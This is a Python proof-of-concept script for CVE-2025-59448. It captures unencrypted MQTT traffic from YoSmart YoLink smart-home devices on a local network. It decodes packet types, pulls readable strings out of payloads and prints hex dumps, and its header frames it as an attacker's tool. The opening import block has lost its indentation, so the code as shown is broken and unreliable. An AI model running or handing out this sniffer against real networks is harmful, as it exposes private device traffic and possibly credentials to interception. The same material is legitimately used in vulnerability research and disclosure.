#!/usr/bin/env python3
# CVE-2025-59448 - YoSmart YoLink Unencrypted MQTT Sniffing PoC
# This PoC demonstrates how an attacker can sniff unencrypted MQTT traffic
# from the YoSmart YoLink ecosystem on a local network.
import socket
import struct
import sys
import argparse
from datetime import datetime
try:
from scapy.all import sniff, TCP, Raw
except ImportError:
print("[-] scapy is required. Install with: pip install scapy")
sys.exit(1)
# MQTT control packet types, keyed by the upper nibble of the first
# fixed-header byte. Values 1-14 exist in MQTT 3.1.1; 15 (AUTH) was added
# in MQTT 5.0. Value 0 is reserved and is reported as unknown.
_MQTT_PACKET_TYPES = {
    1: "CONNECT", 2: "CONNACK", 3: "PUBLISH",
    4: "PUBACK", 5: "PUBREC", 6: "PUBREL",
    7: "PUBCOMP", 8: "SUBSCRIBE", 9: "SUBACK",
    10: "UNSUBSCRIBE", 11: "UNSUBACK",
    12: "PINGREQ", 13: "PINGRESP", 14: "DISCONNECT",
    15: "AUTH",
}


def parse_mqtt_packet(data):
    """Return the MQTT control packet type name for a raw payload.

    Only the first byte is decoded: its upper four bits select the control
    packet type. The flag nibble and the remaining-length field are not
    interpreted.

    Args:
        data: Raw payload bytes, expected to start at an MQTT fixed header.

    Returns:
        The packet type name (e.g. ``"PUBLISH"``), ``"UNKNOWN(<n>)"`` for a
        type value with no known name, or ``None`` when ``data`` is shorter
        than the two-byte minimum fixed header.
    """
    if len(data) < 2:
        return None
    packet_type = (data[0] >> 4) & 0x0F
    return _MQTT_PACKET_TYPES.get(packet_type, f"UNKNOWN({packet_type})")
def extract_strings(data, min_length=4):
    """Collect the runs of printable ASCII contained in binary data.

    A run is a maximal sequence of consecutive byte values in the range
    32..126 inclusive; every other value terminates the current run.

    Args:
        data: Iterable of integer byte values, such as a ``bytes`` object.
        min_length: Minimum number of characters a run needs to be kept.

    Returns:
        A list of the qualifying runs as ``str``, in order of appearance.
    """
    # The separator lies outside the printable range, so it can never be
    # part of a run; splitting on it recovers exactly the original runs.
    separator = "\n"
    text = "".join(
        chr(value) if 32 <= value <= 126 else separator
        for value in data
    )
    return [run for run in text.split(separator) if len(run) >= min_length]
def _endpoint_hosts(tcp_layer):
    """Return the (src, dst) addresses of the layer that carries the TCP segment."""
    # Walk down from TCP instead of assuming the address-bearing header is
    # always the second layer of the frame; that assumption breaks when an
    # extra header (e.g. a VLAN tag) sits between the link and IP layers.
    layer = tcp_layer.underlayer
    while layer is not None and not hasattr(layer, "src"):
        layer = layer.underlayer
    return getattr(layer, "src", "?"), getattr(layer, "dst", "?")


def packet_callback(packet):
    """Print a summary of one captured packet on the MQTT port (1883).

    Packets without both a TCP layer and a Raw payload, or whose source and
    destination ports are both different from 1883, are ignored. For the
    rest, the function prints a timestamped header line with the decoded
    MQTT packet type and both endpoints, up to ten printable strings found
    in the payload, and the first 100 payload bytes as hex.

    Args:
        packet: A scapy packet, as passed to the ``prn`` callback of
            ``sniff``.
    """
    if not (packet.haslayer(TCP) and packet.haslayer(Raw)):
        return
    tcp_layer = packet[TCP]
    if 1883 not in (tcp_layer.sport, tcp_layer.dport):
        return

    payload = bytes(packet[Raw].load)
    # parse_mqtt_packet returns None for payloads shorter than a fixed
    # header; show a readable label instead of the literal "None".
    mqtt_type = parse_mqtt_packet(payload) or "UNKNOWN"
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

    src_host, dst_host = _endpoint_hosts(tcp_layer)
    src = f"{src_host}:{tcp_layer.sport}"
    dst = f"{dst_host}:{tcp_layer.dport}"
    print(f"\n[{timestamp}] MQTT {mqtt_type} | {src} -> {dst}")

    strings = extract_strings(payload)
    if strings:
        print(f"  Extracted data: {strings[:10]}")
    # Slice before encoding so only the displayed bytes are converted
    # (100 bytes == 200 hex characters).
    print(f"  Raw hex: {payload[:100].hex()}")
def main():
    """Parse the command line, print a banner and start sniffing.

    Options: ``-i/--interface`` (capture interface, default ``None``),
    ``-f/--filter`` (BPF filter, default ``"tcp port 1883"``) and
    ``-c/--count`` (number of packets to capture, ``0`` for no limit).
    Each captured packet is handed to ``packet_callback``.

    A ``KeyboardInterrupt`` ends the capture with a message; a
    ``PermissionError`` prints a hint and exits with status 1.
    """
    cli = argparse.ArgumentParser(
        description="CVE-2025-59448 PoC - Sniff YoSmart YoLink unencrypted MQTT traffic"
    )
    cli.add_argument(
        "-i", "--interface",
        default=None,
        help="Network interface to sniff on",
    )
    cli.add_argument(
        "-f", "--filter",
        default="tcp port 1883",
        help="BPF filter (default: tcp port 1883)",
    )
    cli.add_argument(
        "-c", "--count",
        type=int,
        default=0,
        help="Number of packets to capture (0=infinite)",
    )
    opts = cli.parse_args()

    banner_rule = "=" * 60
    print(banner_rule)
    print("CVE-2025-59448 - YoSmart YoLink MQTT Sniffer PoC")
    print(banner_rule)
    print(f"[*] Interface: {opts.interface or 'default'}")
    print(f"[*] Filter: {opts.filter}")
    print("[*] Waiting for MQTT traffic (Ctrl+C to stop)...\n")

    try:
        # store=0: packets are handled by the callback only
        # (presumably not retained by scapy; confirm against sniff docs).
        sniff(
            iface=opts.interface,
            filter=opts.filter,
            prn=packet_callback,
            count=opts.count,
            store=0,
        )
    except KeyboardInterrupt:
        print("\n[*] Stopped by user.")
    except PermissionError:
        print("[-] Permission denied. Run with sudo/Administrator privileges.")
        sys.exit(1)


if __name__ == "__main__":
    main()